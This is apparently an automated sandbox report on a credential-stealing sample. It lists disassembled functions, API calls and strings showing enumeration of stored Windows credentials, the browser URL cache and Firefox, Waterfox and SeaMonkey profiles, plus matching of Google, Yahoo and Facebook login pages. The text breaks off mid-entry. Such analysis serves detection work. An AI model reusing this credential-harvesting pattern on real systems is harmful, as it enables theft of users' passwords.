                      control_flow_graph 697 4466f4-44670e call 446904 GetModuleHandleA 700 446710-44671b 697->700 701 44672f-446732 697->701 700->701 702 44671d-446726 700->702 703 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 701->703 705 446747-44674b 702->705 706 446728-44672d 702->706 710 4467ac-4467b7 __setusermatherr 703->710 711 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 703->711 705->701 709 44674d-44674f 705->709 706->701 708 446734-44673b 706->708 708->701 712 44673d-446745 708->712 713 446755-446758 709->713 710->711 716 446810-446819 711->716 717 44681e-446825 711->717 712->713 713->703 718 4468d8-4468dd call 44693d 716->718 719 446827-446832 717->719 720 44686c-446870 717->720 723 446834-446838 719->723 724 44683a-44683e 719->724 721 446845-44684b 720->721 722 446872-446877 720->722 728 446853-446864 GetStartupInfoW 721->728 729 44684d-446851 721->729 722->720 723->719 723->724 724->721 726 446840-446842 724->726 726->721 730 446866-44686a 728->730 731 446879-44687b 728->731 729->726 729->728 732 44687c-446894 GetModuleHandleA call 41276d 730->732 731->732 735 446896-446897 exit 732->735 736 44689d-4468d6 _cexit 732->736 735->736 736->718
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                      • String ID:
                      • API String ID: 2827331108-0
                      • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                      • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                      • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                      • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                      Control-flow Graph

                      APIs
                      • memset.MSVCRT ref: 0040C298
                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                      • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                      • wcschr.MSVCRT ref: 0040C324
                      • wcschr.MSVCRT ref: 0040C344
                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                      • GetLastError.KERNEL32 ref: 0040C373
                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                      • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                      • String ID: visited:
                      • API String ID: 1157525455-1702587658
                      • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                      • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                      • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                      • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset 763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 782 40e283-40e286 775->782 776->775 787 40e21b-40e21d 776->787 783 40e291-40e294 call 40aa04 782->783 784 40e288-40e290 free 782->784 783->769 784->783 787->775 788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775
                      APIs
                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                      • memset.MSVCRT ref: 0040E1BD
                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                      • free.MSVCRT ref: 0040E28B
                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                        • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                        • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                      • _snwprintf.MSVCRT ref: 0040E257
                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                      • String ID: $ContainerId$Container_%I64d$Containers$Name
                      • API String ID: 2804212203-2982631422
                      • Opcode ID: 011f1ee4c8a676e7993d49e178f6fd90f7880661b1005521c0cb7dff8e01015d
                      • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                      • Opcode Fuzzy Hash: 011f1ee4c8a676e7993d49e178f6fd90f7880661b1005521c0cb7dff8e01015d
                      • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                      Control-flow Graph

                      APIs
                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                        • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                      • memset.MSVCRT ref: 0040BC75
                      • memset.MSVCRT ref: 0040BC8C
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                      • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                      • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                      • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                      • String ID:
                      • API String ID: 115830560-3916222277
                      • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                      • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                      • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                      • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                      Control-flow Graph

                      APIs
                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                      • _wcslwr.MSVCRT ref: 0040C817
                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                      • wcslen.MSVCRT ref: 0040C82C
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                      • API String ID: 2936932814-4196376884
                      • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                      • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                      • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                      • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 886 40bdb0-40bdce call 404363 889 40bf63-40bf6f call 40440c 886->889 890 40bdd4-40bddd 886->890 892 40bdee 890->892 893 40bddf-40bdec CredEnumerateW 890->893 894 40bdf0-40bdf2 892->894 893->894 894->889 896 40bdf8-40be18 call 40b2cc wcslen 894->896 899 40bf5d 896->899 900 40be1e-40be20 896->900 899->889 900->899 901 40be26-40be42 wcsncmp 900->901 902 40be48-40be77 call 40bd5d call 404423 901->902 903 40bf4e-40bf57 901->903 902->903 908 40be7d-40bea3 memset 902->908 903->899 903->900 909 40bea5 908->909 910 40bea7-40beea memcpy 908->910 909->910 911 40bf11-40bf2d wcschr 910->911 912 40beec-40bf06 call 40b2cc _wcsnicmp 910->912 913 40bf38-40bf48 LocalFree 911->913 914 40bf2f-40bf35 911->914 912->911 917 40bf08-40bf0e 912->917 913->903 914->913 917->911
                      APIs
                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                      • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                      • wcslen.MSVCRT ref: 0040BE06
                      • wcsncmp.MSVCRT ref: 0040BE38
                      • memset.MSVCRT ref: 0040BE91
                      • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                      • _wcsnicmp.MSVCRT ref: 0040BEFC
                      • wcschr.MSVCRT ref: 0040BF24
                      • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                      • String ID:
                      • API String ID: 697348961-0
                      • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                      • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                      • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                      • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                      APIs
                      • memset.MSVCRT ref: 00403CBF
                      • memset.MSVCRT ref: 00403CD4
                      • memset.MSVCRT ref: 00403CE9
                      • memset.MSVCRT ref: 00403CFE
                      • memset.MSVCRT ref: 00403D13
                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                      • memset.MSVCRT ref: 00403DDA
                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                      • String ID: Waterfox$Waterfox\Profiles
                      • API String ID: 1829478387-11920434
                      • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                      • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                      • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                      • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                      APIs
                      • memset.MSVCRT ref: 00403E50
                      • memset.MSVCRT ref: 00403E65
                      • memset.MSVCRT ref: 00403E7A
                      • memset.MSVCRT ref: 00403E8F
                      • memset.MSVCRT ref: 00403EA4
                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                      • memset.MSVCRT ref: 00403F6B
                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                      • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                      • API String ID: 1829478387-2068335096
                      • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                      • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                      • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                      • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                      APIs
                      • memset.MSVCRT ref: 00403FE1
                      • memset.MSVCRT ref: 00403FF6
                      • memset.MSVCRT ref: 0040400B
                      • memset.MSVCRT ref: 00404020
                      • memset.MSVCRT ref: 00404035
                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                      • memset.MSVCRT ref: 004040FC
                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                      • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                      • API String ID: 1829478387-3369679110
                      • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                      • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                      • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                      • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                      APIs
                      • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                      • API String ID: 3510742995-2641926074
                      • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                      • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                      • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                      • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                      APIs
                      • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                      • GetLastError.KERNEL32 ref: 0041847E
                      • free.MSVCRT ref: 0041848B
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: CreateErrorFileLastfree
                      • String ID: |A
                      • API String ID: 981974120-1717621600
                      • Opcode ID: 51ca5a02fc44f8a5d6c80fe755b484a3b8e8795a5c0060307af42e5ba884e769
                      • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                      • Opcode Fuzzy Hash: 51ca5a02fc44f8a5d6c80fe755b484a3b8e8795a5c0060307af42e5ba884e769
                      • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                      APIs
                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                        • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                        • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                      • memset.MSVCRT ref: 004033B7
                      • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                      • wcscmp.MSVCRT ref: 004033FC
                      • _wcsicmp.MSVCRT ref: 00403439
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                      • String ID: $0.@
                      • API String ID: 2758756878-1896041820
                      • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                      • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                      • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                      • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                      APIs
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                      • String ID:
                      • API String ID: 2941347001-0
                      • Opcode ID: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                      • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                      • Opcode Fuzzy Hash: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                      • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                      APIs
                      • memset.MSVCRT ref: 00403C09
                      • memset.MSVCRT ref: 00403C1E
                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                      • wcscat.MSVCRT ref: 00403C47
                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                      • wcscat.MSVCRT ref: 00403C70
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memsetwcscat$wcscpywcslen
                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                      • API String ID: 2489821370-1174173950
                      • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                      • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                      • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                      • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                      APIs
                      • memset.MSVCRT ref: 0040A824
                      • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • wcscpy.MSVCRT ref: 0040A854
                      • wcscat.MSVCRT ref: 0040A86A
                      • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                      • String ID:
                      • API String ID: 669240632-0
                      • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                      • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                      • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                      • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                      APIs
                      • wcschr.MSVCRT ref: 00414458
                      • _snwprintf.MSVCRT ref: 0041447D
                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                      • String ID: "%s"
                      • API String ID: 1343145685-3297466227
                      • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                      • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                      • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                      • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                      APIs
                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
